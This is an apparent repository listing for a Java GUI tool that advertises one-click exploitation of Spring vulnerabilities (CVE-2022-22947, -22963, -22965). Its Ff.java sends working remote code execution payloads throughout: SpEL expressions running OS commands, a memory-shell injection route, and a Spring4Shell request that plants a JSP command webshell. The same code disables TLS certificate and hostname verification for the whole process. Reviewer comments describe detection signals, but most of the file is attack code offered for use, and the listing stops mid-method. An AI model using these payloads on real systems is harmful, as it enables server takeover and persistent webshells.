├── README.md
├── main
└── java
│ ├── Ff.java
│ ├── META-INF
│ └── MANIFEST.MF
│ ├── Main.java
│ ├── TrustAllTrustManager.java
│ ├── ff.fxml
│ ├── main.iml
│ └── out
│ └── production
│ └── main
│ ├── Ff$1.class
│ ├── Ff.class
│ ├── META-INF
│ └── MANIFEST.MF
│ ├── Main.class
│ ├── TrustAllTrustManager.class
│ ├── ff.fxml
│ └── main.iml
└── out
├── artifacts
└── ceshi_jar
│ └── ceshi.jar
└── production
└── ceshi
├── Ff$1.class
├── Ff$2.class
├── Ff$ResponseHeader.class
├── Ff.class
├── META-INF
└── MANIFEST.MF
├── Main.class
├── TrustAllTrustManager.class
├── ff.fxml
├── main.iml
└── out
└── production
└── main
├── META-INF
└── MANIFEST.MF
├── ff.fxml
└── main.iml
/README.md:
--------------------------------------------------------------------------------
1 |
2 |
3 | 没事写一个工具
4 |
5 | SpringbootGuiExploit漏洞利用工具采用java开发
6 |
7 | 收录漏洞
8 |
9 | +++ Spring Cloud Gateway RCE(CVE-2022-22947) 一键检测漏洞 一键getshell
10 |
11 | +++Spring Cloud Function SpEL RCE (CVE-2022-22963) 一键检测漏洞 一键反弹shell
12 |
13 | +++Spring Framework RCE (CVE-2022-22965) 一键检测漏洞 一键getshell
14 |
15 | 优化http网站漏洞检测 优化网站去重/ 优化错误编码输出去重
16 |
17 | 新增Jolokia Realm JNDI RCE漏洞检查
18 |
19 | 新增SnakeYAML_RCE漏洞检查
20 |
21 | 新增SpringBoot-Eureka-xstream-rce漏洞检查
22 |
--------------------------------------------------------------------------------
/main/java/Ff.java:
--------------------------------------------------------------------------------
1 | import javafx.collections.FXCollections;
2 | import javafx.collections.ObservableList;
3 | import javafx.embed.swing.JFXPanel;
4 | import javafx.event.ActionEvent;
5 | import javafx.fxml.FXML;
6 | import javafx.scene.Scene;
7 | import javafx.scene.control.*;
8 | import javafx.scene.layout.StackPane;
9 | import javafx.scene.layout.VBox;
10 | import jdk.internal.org.objectweb.asm.tree.analysis.Value;
11 | import jdk.nashorn.internal.objects.NativeError;
12 | import jdk.nashorn.internal.objects.annotations.Constructor;
13 | import net.sf.json.JSONArray;
14 | import net.sf.json.JSONObject;
15 | import sun.net.www.http.HttpClient;
16 | import sun.nio.ch.Net;
17 | import javafx.scene.control.ComboBox;
18 |
19 | import java.io.*;
20 | import java.net.*;
21 | import java.net.HttpURLConnection;
22 |
23 | import javax.net.ssl.*;
24 | import javax.print.DocFlavor;
25 | import java.net.URL;
26 | import java.nio.charset.StandardCharsets;
27 | import java.security.KeyManagementException;
28 | import java.security.NoSuchAlgorithmException;
29 | import java.time.Duration;
30 | import java.util.regex.Matcher;
31 | import java.util.regex.Pattern;
32 |
33 |
34 | import static sun.net.www.http.HttpClient.*;
35 |
36 |
37 | public class Ff {
38 |
39 |
40 |
41 |
42 |
43 |
44 |
// FXML-injected button; not referenced by the methods visible in this listing.
@FXML
private Button Click1;

// FXML-injected button; not referenced by the methods visible in this listing.
@FXML
private Button Click;

// Output area that the check methods append their result messages to.
@FXML
private TextArea responsetest;

// Output area that send6() writes its response text and failure message to.
@FXML
private TextArea responsetest2;


// Text field holding the target base URL; the request methods in this listing read it via getText().
@FXML
private TextField urlTest;

// Only referenced from commented-out code in this listing.
@FXML
private TextField urltest1;

// Not referenced by the methods visible in this listing.
@FXML
private TextField urltest5;


// NOTE(review): the generic type argument was lost in extraction ("ComboBox>"); restore it from the original file.
@FXML
private ComboBox> chbox;

// Declared without @FXML and not used by the methods visible in this listing.
private JFXPanel primaryStage;
77 |
/**
 * FXML action handler that forwards to {@code send8()}, which issues a GET to the
 * target's {@code /actuator/gateway/routes/test113} endpoint.
 *
 * @param event the UI event; not inspected
 */
@FXML
void Clickevent2(ActionEvent event) {
    this.send8();
}
82 |
/**
 * FXML action handler that forwards to {@code rce2()}.
 *
 * <p>{@code rce2()} writes a route definition to the target named in {@code urlTest},
 * so triggering this handler changes state on the remote system.
 *
 * @param event the UI event; not inspected
 */
@FXML
void Clickevent3(ActionEvent event) {
    this.rce2();
}
90 |
91 |
// Only referenced from commented-out code in this listing.
@FXML
private TextField urltest4;
// Not annotated with @FXML; only referenced from commented-out code in this listing.
private TextArea fd;

// Not referenced by the methods visible in this listing.
@FXML
private TextArea responsetest11;

// Output area that rce1() clears and rce2() writes its result to.
@FXML
private TextArea responsetest1;
101 |
102 |
/**
 * FXML action handler that forwards to {@code send6()}, which sends a POST carrying a
 * fixed {@code cmd} query parameter to the target.
 *
 * @param event the UI event; not inspected
 */
@FXML
void send4(ActionEvent event) {
    this.send6();
}
110 |
111 |
112 |
/**
 * FXML action handler with an empty body; it performs no work.
 *
 * @param event the UI event; not inspected
 */
@FXML
void rce(ActionEvent event) {
    // No action is wired to this handler.
}
121 |
122 |
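/**
 * Issues a GET to {@code <target>/actuator/gateway/routes/test113} and reads the
 * response body to the end.
 *
 * <p>The body is neither displayed nor returned. The target base URL comes from
 * {@code urlTest}, with one trailing slash removed. Failures are printed to stderr.
 * The reader is closed and the connection released on every path.
 *
 * <p>The call blocks the calling thread for the duration of the request.
 */
public void send8() {
    String base = urlTest.getText();
    if (base.endsWith("/")) {
        // Drop the trailing slash so the appended path does not start with "//".
        base = base.substring(0, base.length() - 1);
    }

    HttpURLConnection connection = null;
    try {
        URL routeUrl = new URL(base + "/actuator/gateway/routes/test113");
        connection = (HttpURLConnection) routeUrl.openConnection();
        connection.setRequestMethod("GET");

        // try-with-resources closes the reader (and the underlying stream) even on error.
        try (BufferedReader reader = new BufferedReader(
                new InputStreamReader(connection.getInputStream(), StandardCharsets.UTF_8))) {
            while (reader.readLine() != null) {
                // Drain the body; nothing in this method consumes its content.
            }
        }
    } catch (Exception e) {
        e.printStackTrace();
    } finally {
        if (connection != null) {
            connection.disconnect();
        }
    }
}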
184 |
185 |
// NOTE(review): the generic type argument was lost in extraction ("ComboBox>"); restore it from the original file.
// Not referenced by the methods visible in this listing.
@FXML
private ComboBox> uurltest4;
188 |
189 |
/** FXML-annotated no-argument placeholder; it performs no work. */
@FXML
public void rce() {
    // Intentionally empty.
}
201 |
/** Placeholder method with an empty body; it performs no work. */
public void ceshi() {
    // Intentionally empty.
}
206 |
/**
 * Posts a route definition to {@code <target>/actuator/gateway/routes/test113} and
 * writes the outcome to {@code responsetest1}.
 *
 * <p>Only {@code json2} is sent; {@code json} and {@code json1} are built but unused.
 * Each definition carries a SpEL expression in an {@code AddResponseHeader} filter
 * argument. In this listing the Base64 class-bytes argument is an empty string in
 * {@code json2} and a placeholder in {@code json1}.
 *
 * <p>On HTTP 201 the method calls {@code send5()} (a POST to
 * {@code /actuator/gateway/refresh}) and reports success together with the path
 * {@code /gmem}; every other status is reported as a failure.
 *
 * <p>Process-wide side effects: the JVM HTTPS proxy is set to 127.0.0.1:8080, and a
 * default SSL socket factory and an accept-everything hostname verifier are installed
 * for every later {@code HttpsURLConnection} in this process.
 *
 * <p>Defender notes: the traffic produced is a write under
 * {@code /actuator/gateway/routes/} followed by a request to
 * {@code /actuator/gateway/refresh}. The route id {@code wolaile} and the path
 * {@code /gmem} are the literal values used here and can be searched for in gateway
 * configuration and access logs. Keeping the gateway actuator endpoints off untrusted
 * networks and applying the vendor fix for the CVE this tool names (CVE-2022-22947)
 * are the relevant mitigations.
 *
 * @throws RuntimeException wrapping any protocol, URL, TLS-setup or I/O failure
 */
public void rce2() {

    try {

        Button button = new Button(); // never used in this method
        // JVM-wide setting: all later HTTPS connections from this process go through 127.0.0.1:8080.
        System.setProperty("https.proxyHost", "127.0.0.1");
        System.setProperty("https.proxyPort", "8080");

        // Hostname verifier that accepts every host name, i.e. hostname checking is switched off.
        HostnameVerifier hv = new HostnameVerifier() {
            @Override
            public boolean verify(String urlHostName, SSLSession session) {
                return true;
            }
        };
        // Configure the trust manager.
        // NOTE(review): TrustAllTrustManager is not shown here; by its name it presumably accepts any certificate - confirm.
        TrustManager[] trustAllCerts = {new TrustAllTrustManager()};
        SSLContext sc = SSLContext.getInstance("SSL");
        SSLSessionContext sslsc = sc.getServerSessionContext();
        sslsc.setSessionTimeout(0);
        sc.init(null, trustAllCerts, null);
        // Installed as the process-wide default, so it affects every HttpsURLConnection created afterwards.
        HttpsURLConnection.setDefaultSSLSocketFactory(sc.getSocketFactory());
        // Install the hostname verifier defined above as the process-wide default.
        HttpsURLConnection.setDefaultHostnameVerifier(hv);


        String url = urlTest.getText();
        if (url.endsWith("/")) {
            url = url.substring(0, url.length() - 1); // drop the trailing slash
        }

        // The validity check only prints a message; execution continues with the same URL either way.
        if (!isValidUrl(url)) responsetest.appendText("输入的不是有效的网址" + "\n");
        else {

        }
        URL url1 = new URL(url + "/actuator/gateway/routes/test113");

        // Built but not sent by this method.
        String json = "{\n" +
                " \"id\": \"test\",\n" +
                " \"filters\": [{\n" +
                " \"name\": \"AddResponseHeader\",\n" +
                " \"args\": {\n" +
                " \"name\": \"Result\",\n" +
                " \"value\": \"#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\\\"whoami\\\"}).getInputStream()))}\"\n" +
                " }\n" +
                " }],\n" +
                " \"uri\": \"http://example.com\"\n" +
                "}";
        // Built but not sent by this method.
        String json1 = "{\n" +
                " \"id\": \"test\",\n" +
                " \"filters\": [{\n" +
                " \"name\": \"AddResponseHeader\",\n" +
                " \"args\": {\"name\": \"Result\",\"value\": \"#{T(org.springframework.cglib.core.ReflectUtils).defineClass('NettyMemshell',T(org.springframework.util.Base64Utils).decodeFromString('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'),new javax.management.loading.MLet(new java.net.URL[0],T(java.lang.Thread).currentThread().getContextClassLoader())).doInject()}\"}\n" +
                " }],\n" +
                " \"uri\": \"http://example.com\",\n" +
                " \"order\": 0\n" +
                "}";

        // The definition that is actually sent: route id "wolaile" with a Path predicate of "/gmem**".
        String json2 = "{\n" +
                "\"predicates\":[{\"name\": \"Path\",\n" +
                "\"args\":{\"_genkey_0\":\"/gmem**\"}\n" +
                "}\n" +
                "],\n" +
                " \"id\": \"wolaile\",\n" +
                " \"filters\": [{\n" +
                " \"name\": \"AddResponseHeader\",\n" +
                " \"args\": {\n" +
                " \"name\": \"Result\",\n" +
                " \"value\": \"#{T(org.springframework.cglib.core.ReflectUtils).defineClass('com.example.GMemShell',T(org.springframework.util.Base64Utils).decodeFromString(''),new javax.management.loading.MLet(new java.net.URL[0],T(java.lang.Thread).currentThread().getContextClassLoader())).doInject(@requestMappingHandlerMapping,'/gmem')}\"\n" +
                " }\n" +
                " }],\n" +
                " \"uri\": \"http://test.com\"\n" +
                "}";

        HttpURLConnection connection = (HttpURLConnection) url1.openConnection();
        // Fixed User-Agent string; the trailing "Hutool" token makes it distinctive in access logs.
        connection.setRequestProperty("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36 Hutool");
        // No request method is set explicitly; the body is written through the output stream below.
        connection.setDoOutput(true);


        connection.setRequestProperty("Content-Type", "application/json");
        byte[] input = json2.getBytes(StandardCharsets.UTF_8);
        OutputStream os = connection.getOutputStream();

        os.write(input, 0, input.length);
        os.flush();
        int responseCode = connection.getResponseCode();

        if (responseCode == 201) {
            // The route was accepted: trigger the refresh request, then report the target and the /gmem path.
            send5();
            responsetest1.appendText("目标:" + url +"\n" + "注入成功" + "\n");
            responsetest1.appendText( "/gmem" + "\n");

        }
        else{

            responsetest1.appendText("目标:" + url + "\n" + " 注入失败" + "\n");
        }
    } catch (ProtocolException e) {
        throw new RuntimeException(e);
    } catch (MalformedURLException e) {
        throw new RuntimeException(e);
    } catch (NoSuchAlgorithmException e) {
        throw new RuntimeException(e);
    } catch (IOException e) {
        throw new RuntimeException(e);
    } catch (KeyManagementException e) {
        throw new RuntimeException(e);
    }
}
335 |
/** Clears both result areas, {@code responsetest} and {@code responsetest1}. */
public void rce1() {
    final String empty = "";
    responsetest.setText(empty);
    responsetest1.setText(empty);
}
343 |
/**
 * Builds an HTTP proxy descriptor for 127.0.0.1:8080 and discards it.
 *
 * <p>The descriptor is not stored or handed to any connection, so calling this
 * method does not change how requests are routed.
 */
public void daili() {
    InetSocketAddress localProxyAddress = new InetSocketAddress("127.0.0.1", 8080);
    Proxy unusedProxy = new Proxy(Proxy.Type.HTTP, localProxyAddress);
}
353 |
354 |
/**
 * "Command execution" action: sends a POST to {@code <target>/?cmd=ipconfig} and
 * writes text to {@code responsetest2}.
 *
 * <p>The {@code cmd} value is fixed; no user input is placed in the request. The
 * response body is read to the end but its lines are not kept.
 *
 * <p>NOTE(review): the text appended on success is the string form of the reader's
 * final {@code null} result, not the response body.
 *
 * <p>Defender notes: the request shows up as a POST to the site root with a
 * {@code cmd} query parameter and a form content type.
 */
public void send6() {
    Button unusedButton = new Button("Click");

    String target = urlTest.getText();
    if (target.endsWith("/")) {
        // Drop the trailing slash before appending the query.
        target = target.substring(0, target.length() - 1);
    }

    try {
        HttpURLConnection conn = (HttpURLConnection) new URL(target + "/?cmd=ipconfig").openConnection();
        conn.setDoOutput(true);
        conn.setRequestMethod("POST");
        conn.setRequestProperty("Content-Type", "application/x-www-form-urlencoded");

        // Forces the request to be sent; the status itself is not inspected.
        conn.getResponseCode();

        BufferedReader reader = new BufferedReader(new InputStreamReader(conn.getInputStream()));
        String line = reader.readLine();
        while (line != null) {
            line = reader.readLine();
        }

        // 'line' is null at this point, so the buffer receives the text "null".
        StringBuffer shown = new StringBuffer();
        shown.append(line);
        reader.close();

        responsetest2.appendText(shown.toString());
    } catch (Exception e) {
        responsetest2.appendText("命令执行失败,网络异常" + "\n");
    }
}
424 |
/**
 * Sends a DELETE to {@code <target>/actuator/gateway/routes/test}.
 *
 * <p>The status code is printed to stdout. On 200 or 201 the first response line is
 * read (and not used) and two placeholder lines are appended to {@code responsetest}.
 * Failures are printed to stderr. The target URL is used as typed, without trimming
 * a trailing slash.
 *
 * <p>Defender notes: the route name here is {@code test}, while the other methods in
 * this listing create {@code test113}, so this call does not remove that route.
 */
public void send3() {
    final String base = urlTest.getText();
    try {
        HttpURLConnection conn =
                (HttpURLConnection) new URL(base + "/actuator/gateway/routes/test").openConnection();
        conn.setRequestMethod("DELETE");

        final int status = conn.getResponseCode();
        System.out.println("Response Code : " + status);

        boolean accepted = status == 200 || status == 201;
        if (!accepted) {
            return;
        }

        BufferedReader reader = new BufferedReader(new InputStreamReader(conn.getInputStream()));
        StringBuffer firstLine = new StringBuffer();
        firstLine.append(reader.readLine());
        responsetest.appendText("...." + "\n" + "...." + "\n");
    } catch (Exception e) {
        e.printStackTrace();
    }
}
451 |
/**
 * Fetches {@code <target>/actuator/gateway/routes/test113} with a GET and shows the
 * response in {@code responsetest}.
 *
 * <p>After the body is read, the accumulated text is searched for a
 * {@code "predicate":"..."} pair and the captured value is appended with the label
 * "返回标识:" ("returned marker:"). Failures are printed to stderr.
 *
 * <p>Defender notes: this is a read of the route that the other methods create, so a
 * GET on {@code /actuator/gateway/routes/test113} shortly after a POST to the same
 * path is part of the same sequence in access logs.
 */
public void send2() {


    String url = urlTest.getText();
    if (url.endsWith("/")) {
        url = url.substring(0, url.length() - 1); // drop the trailing slash
    }

    try {
        URL url1 = new URL(url + "/actuator/gateway/routes/test113");
        HttpURLConnection connection = (HttpURLConnection) url1.openConnection();
        connection.setRequestMethod("GET");

        // NOTE(review): the reader is never closed in this method.
        BufferedReader br = new BufferedReader(new InputStreamReader(connection.getInputStream()));

        StringBuffer response = new StringBuffer();
        String inputLine;
        // The first line is appended unconditionally (the text "null" if the body is empty).
        response.append(inputLine = br.readLine());
        while ((inputLine = br.readLine()) != null) {

            response.append(inputLine);
            // The whole accumulated buffer is appended to the UI on every iteration.
            responsetest.appendText(response.toString());
        }

        // inputLine is null here, so this appends the text "null" to the buffer.
        response.append(inputLine);
        String regex = "\"predicate\":\\\"([^\"]*)\\\"";
        Pattern pattern = Pattern.compile(regex);
        Matcher matcher = pattern.matcher(response);
        if (matcher.find()) {
            String value = matcher.group(1); // the captured value between the quotes
            responsetest.appendText("返回标识:"+value+"\n");
        } else {
            // nothing is reported when the pattern is absent
        }

    } catch (Exception e) {

        e.printStackTrace();

    }
}
515 |
516 |
/**
 * Sends a POST with no body to {@code <target>/actuator/gateway/refresh} and prints
 * the status code to stdout.
 *
 * <p>The status is not acted on, and any exception is dropped without being reported
 * to the user or a log.
 *
 * <p>Defender notes: in this tool the call follows a route write, so a POST to
 * {@code /actuator/gateway/refresh} right after a POST under
 * {@code /actuator/gateway/routes/} is the pattern to look for.
 */
public void send5() {
    final String typed = urlTest.getText();
    // Drop one trailing slash so the appended path stays well-formed.
    final String target = typed.endsWith("/") ? typed.substring(0, typed.length() - 1) : typed;

    try {
        URL refreshUrl = new URL(target + "/actuator/gateway/refresh");
        HttpURLConnection conn = (HttpURLConnection) refreshUrl.openConnection();
        conn.setRequestMethod("POST");

        int status = conn.getResponseCode();
        System.out.println("Response Code : " + status);
        // A 200 response triggers no further action here.
    } catch (Exception ignored) {
        // Failures are not surfaced anywhere.
    }
}
558 |
/**
 * Prepares a POST with an empty body to {@code <target>/actuator/gateway/refresh} and,
 * on HTTP 200, appends a "possibly vulnerable" message to {@code responsetest}.
 *
 * <p>The target URL is used as typed, without trimming a trailing slash. A malformed
 * URL is printed to stderr; any other I/O failure is dropped silently.
 *
 * <p>NOTE(review): a 200 from the refresh endpoint only shows that the endpoint is
 * reachable, so the message is an indication rather than a confirmed finding.
 */
public void send1() {
    try {

        String url = urlTest.getText();
        URL url1 = new URL(url + "/actuator/gateway/refresh");
        String json = "";
        HttpURLConnection connection = (HttpURLConnection) url1.openConnection();
        // NOTE(review): the output stream is requested before setDoOutput(true) below; HttpURLConnection
        // rejects that with a ProtocolException, which the empty IOException handler swallows.
        OutputStream os = connection.getOutputStream();
        byte[] input = json.getBytes(StandardCharsets.UTF_8);
        connection.setRequestProperty("Content-Type", "application/x-www-form-urlencoded");
        connection.setDoOutput(true);
        os.write(input, 0, input.length);
        int responseCode = connection.getResponseCode();
        if (responseCode == 200) {

            responsetest.appendText("【+】可能存在Springboot Gateway漏洞" + "\n" + "RCE命令开启" + "\n");

        } else {
            // nothing is reported for other status codes
        }


    } catch (MalformedURLException e) {
        e.printStackTrace();


    } catch (IOException e) {
        // I/O failures are not reported anywhere
    }

}
593 |
/**
 * Performs a shallow format check on a URL string.
 *
 * <p>The pattern only requires an {@code http://} or {@code https://} prefix followed
 * by zero or more non-whitespace characters. It does not check that a host is present
 * or well-formed, so it must not be relied on as validation of the destination.
 *
 * @param url the text to check
 * @return {@code true} when the whole string matches the pattern
 */
private boolean isValidUrl(String url) {
    return Pattern.matches("^(http|https)://[^\\s]*$", url);
}
601 |
602 |
603 |
/**
 * Check for the gateway issue this tool names as CVE-2022-22947: posts a route
 * definition to {@code <target>/actuator/gateway/routes/test113} and classifies the
 * target by status code.
 *
 * <p>Only {@code json} is sent; {@code json1} and {@code json2} are built but unused.
 * HTTP 201 is reported as vulnerable and is followed by {@code send5()} (refresh) and
 * {@code send2()} (read the route back). 404, 401, 403 and 200 are reported as not
 * vulnerable; other codes produce no message. Any exception is reported as
 * "网络异常" ("network error").
 *
 * <p>This is an active check: the definition sent contains a SpEL expression that runs
 * an operating-system command, so a positive result means code was executed on the
 * target, not merely that a version was fingerprinted.
 *
 * <p>Process-wide side effects: the JVM HTTPS proxy is set to 127.0.0.1:8080, and a
 * default SSL socket factory and an accept-everything hostname verifier are installed
 * for every later {@code HttpsURLConnection} in this process.
 *
 * <p>Defender notes: the route is not removed afterwards (the cleanup call is
 * commented out), so a route reachable at {@code /actuator/gateway/routes/test113}
 * with id {@code test} and a response header named {@code Result} can remain as
 * evidence. Keeping the gateway actuator endpoints off untrusted networks and applying
 * the vendor fix for the named CVE are the relevant mitigations.
 */
public void sendGetRequest1() {


    try {


        Button button=new Button(); // never used in this method
        // JVM-wide setting: all later HTTPS connections from this process go through 127.0.0.1:8080.
        System.setProperty("https.proxyHost", "127.0.0.1");
        System.setProperty("https.proxyPort", "8080");

        // Hostname verifier that accepts every host name, i.e. hostname checking is switched off.
        HostnameVerifier hv = new HostnameVerifier() {
            @Override
            public boolean verify(String urlHostName, SSLSession session) {
                return true;
            }
        };
        // Configure the trust manager.
        // NOTE(review): TrustAllTrustManager is not shown here; by its name it presumably accepts any certificate - confirm.
        TrustManager[] trustAllCerts = {new TrustAllTrustManager()};
        SSLContext sc = SSLContext.getInstance("SSL");
        SSLSessionContext sslsc = sc.getServerSessionContext();
        sslsc.setSessionTimeout(0);
        sc.init(null, trustAllCerts, null);
        // Installed as the process-wide default, so it affects every HttpsURLConnection created afterwards.
        HttpsURLConnection.setDefaultSSLSocketFactory(sc.getSocketFactory());
        // Install the hostname verifier defined above as the process-wide default.
        HttpsURLConnection.setDefaultHostnameVerifier(hv);


        String url = urlTest.getText();
        if (url.endsWith("/")) {
            url = url.substring(0, url.length() - 1); // drop the trailing slash
        }

        // The validity check only prints a message; execution continues with the same URL either way.
        if (!isValidUrl(url)) {
            responsetest.appendText("输入的不是有效的网址"+"\n");
        } else {

        }
        URL url1 = new URL(url + "/actuator/gateway/routes/test113");

        // The definition that is actually sent: route id "test" with an AddResponseHeader filter named "Result".
        String json = "{\n" +
                " \"id\": \"test\",\n" +
                " \"filters\": [{\n" +
                " \"name\": \"AddResponseHeader\",\n" +
                " \"args\": {\n" +
                " \"name\": \"Result\",\n" +
                " \"value\": \"#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\\\"whoami\\\"}).getInputStream()))}\"\n" +
                " }\n" +
                " }],\n" +
                " \"uri\": \"http://example.com\"\n" +
                "}";
        // Built but not sent by this method.
        String json1 = "{\n" +
                " \"id\": \"test\",\n" +
                " \"filters\": [{\n" +
                " \"name\": \"AddResponseHeader\",\n" +
                " \"args\": {\"name\": \"Result\",\"value\": \"#{T(org.springframework.cglib.core.ReflectUtils).defineClass('NettyMemshell',T(org.springframework.util.Base64Utils).decodeFromString('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'),new javax.management.loading.MLet(new java.net.URL[0],T(java.lang.Thread).currentThread().getContextClassLoader())).doInject()}\"}\n" +
                " }],\n" +
                " \"uri\": \"http://example.com\",\n" +
                " \"order\": 0\n" +
                "}";

        // Built but not sent by this method.
        String json2="{\n" +
                "\"predicates\":[{\"name\": \"Path\",\n" +
                "\"args\":{\"_genkey_0\":\"/gmem/**\"}\n" +
                "}\n" +
                "],\n" +
                " \"id\": \"wolaile\",\n" +
                " \"filters\": [{\n" +
                " \"name\": \"AddResponseHeader\",\n" +
                " \"args\": {\n" +
                " \"name\": \"Result\",\n" +
                " \"value\": \"#{T(org.springframework.cglib.core.ReflectUtils).defineClass('com.example.GMemShell',T(org.springframework.util.Base64Utils).decodeFromString(''),new javax.management.loading.MLet(new java.net.URL[0],T(java.lang.Thread).currentThread().getContextClassLoader())).doInject(@requestMappingHandlerMapping,'/gmem')}\"\n" +
                " }\n" +
                " }],\n" +
                " \"uri\": \"http://test.com\"\n" +
                "}";

        HttpURLConnection connection = (HttpURLConnection) url1.openConnection();
        // Fixed User-Agent string; the trailing "Hutool" token makes it distinctive in access logs.
        connection.setRequestProperty("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36 Hutool");
        connection.setDoOutput(true);
        connection.setRequestMethod("POST");
        connection.setRequestProperty("Content-Type", "application/json");
        byte[] input = json.getBytes(StandardCharsets.UTF_8);
        OutputStream os = connection.getOutputStream();

        os.write(input, 0, input.length);
        os.flush();
        int responseCode = connection.getResponseCode();

        if (responseCode == 201) {

            responsetest.appendText("目标:"+url+"\n"+"【+】存在Spring Cloud Gateway RCE(CVE-2022-22947)漏洞" + "\n");

            // Refresh the gateway, then read the route back and show it.
            send5();
            send2();

        } else if (responseCode == 404 || responseCode == 401 || responseCode == 403||responseCode==200) {
            responsetest.appendText("目标:"+url+"\n"+"不存在Spring Cloud Gateway RCE(CVE-2022-22947)漏洞" + "\n");

        }

    } catch(Exception e){
        // Every failure, including TLS setup and malformed URLs, is reported as a network error.
        responsetest.appendText("网络异常" + "\n");

    }

}
745 |
/**
 * Check for the issue this tool names as CVE-2022-22965: sends a GET whose query
 * string sets {@code class.module.classLoader...pipeline.first.*} properties
 * (pattern, suffix, directory, prefix, fileDateFormat), together with the request
 * headers {@code suffix}, {@code c1} and {@code c2}, then writes a verdict to
 * {@code responsetest}.
 *
 * <p>NOTE(review): the verdict does not reflect the response. The first test runs on
 * an empty string and the second compares a line to a literal with {@code ==}, so the
 * "not vulnerable" branch is the one that runs whenever the request completes. The
 * request itself is still sent, so that message does not mean the target was left
 * untouched.
 *
 * <p>Defender notes: request parameters beginning with {@code class.module.classLoader}
 * are the signal to look for in access and WAF logs. The parameters here name the
 * directory {@code webapps/ROOT}, the prefix {@code tomcatwar} and the suffix
 * {@code .jsp}, so responders should check the web root for an unexpected
 * {@code tomcatwar.jsp}. Applying the vendor fix for the named CVE is the relevant
 * mitigation.
 */
public void sendspe1() {


    try {

        String url = urlTest.getText();
        if (url.endsWith("/")) {
            url = url.substring(0, url.length() - 1); // drop the trailing slash
        }

        URL url1 = new URL(url + "/?class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di&class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp&class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT&class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar&class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=");
        HttpURLConnection connection = (HttpURLConnection) url1.openConnection();
        connection.setRequestMethod("GET");
        // Fixed User-Agent string; the trailing "Hutool" token makes it distinctive in access logs.
        connection.setRequestProperty("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36 Hutool");
        // Unusual request header names; the pattern parameter above refers to them as %{suffix}i, %{c1}i and %{c2}i.
        connection.setRequestProperty("suffix", "%>//");
        connection.setRequestProperty("c1", "Runtime");
        connection.setRequestProperty("c2", "<%");

        int responseCode = connection.getResponseCode();

        // NOTE(review): the reader is never closed in this method.
        BufferedReader br = new BufferedReader(new InputStreamReader(connection.getInputStream()));

        StringBuffer response = new StringBuffer();
        String inputLine = "";


        {
            // inputLine is still the empty string here, so this test cannot succeed.
            if (inputLine.contains("Hello")){

                responsetest.appendText("存在Spring Framework RCE (CVE-2022-22965)漏洞 \"+\"\\n");
            }


        }
        // Reference comparison with a string literal, not an equals() check on the line's content.
        if ((inputLine = br.readLine()) == "ok") {



            responsetest.appendText("存在Spring Framework RCE (CVE-2022-22965)漏洞 \"+\"\\n");
            responsetest.appendText(url + "/tomcatwar.jsp?pwd=j&cmd=id");


        } else{

            responsetest.appendText("不存在Spring Framework RCE (CVE-2022-22965)漏洞" + "\n");
        }

    } catch (Exception e) {
        // Every failure is reported as a network error.
        responsetest.appendText("网络异常" + "\n");

    }

}
824 |
825 |
/**
 * Check for the issue this tool names as CVE-2022-22963: sends a POST with the body
 * {@code test} to {@code <target>/functionRouter}, carrying a SpEL expression in the
 * {@code spring.cloud.function.routing-expression} request header, then writes a
 * verdict to {@code responsetest}.
 *
 * <p>This is an active check: the header value is an expression that runs an
 * operating-system command on a vulnerable target.
 *
 * <p>NOTE(review): the verdict branches are not reached as written. Reading the body
 * of an error response throws, and after a successful read {@code inputLine} is
 * {@code null} when it is dereferenced, so the method ends in the catch block and
 * reports "网络异常" ("network error") even though the request was sent.
 *
 * <p>Process-wide side effect: the JVM HTTP proxy is set to 127.0.0.1:8080.
 *
 * <p>Defender notes: an inbound request to {@code /functionRouter} that carries a
 * {@code spring.cloud.function.routing-expression} header is the signal to look for.
 * Applying the vendor fix for the named CVE is the relevant mitigation.
 */
public void sendspel() {


    try {


        Button button = new Button(); // never used in this method

        // JVM-wide setting: all later plain-HTTP connections from this process go through 127.0.0.1:8080.
        System.setProperty("http.proxyHost", "127.0.0.1");
        System.setProperty("http.proxyPort", "8080");
        String url = urlTest.getText();
        if (url.endsWith("/")) {
            url = url.substring(0, url.length() - 1); // drop the trailing slash
        }
        URL url1 = new URL(url + "/functionRouter");
        String json = "test";

        HttpURLConnection connection = (HttpURLConnection) url1.openConnection();
        connection.setDoOutput(true);
        connection.setRequestMethod("POST");
        connection.setRequestProperty("Content-Type", "text/plain");
        // The expression travels in a request header, not in the body.
        connection.setRequestProperty("spring.cloud.function.routing-expression", "T(java.lang.Runtime).getRuntime().exec(\"whoami\")");
        // Fixed User-Agent string; the trailing "Hutool" token makes it distinctive in access logs.
        connection.setRequestProperty("User-Agent", "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.142 Safari/537.36 Hutool");
        byte[] input = json.getBytes(StandardCharsets.UTF_8);
        OutputStream os = connection.getOutputStream();

        os.write(input, 0, input.length);
        os.flush();

        int responseCode = connection.getResponseCode();
        // NOTE(review): the reader is never closed in this method.
        BufferedReader br = new BufferedReader(new InputStreamReader(connection.getInputStream()));
        StringBuffer response = new StringBuffer();
        String inputLine;
        response.append(inputLine = br.readLine());
        // Remaining lines are read and discarded.
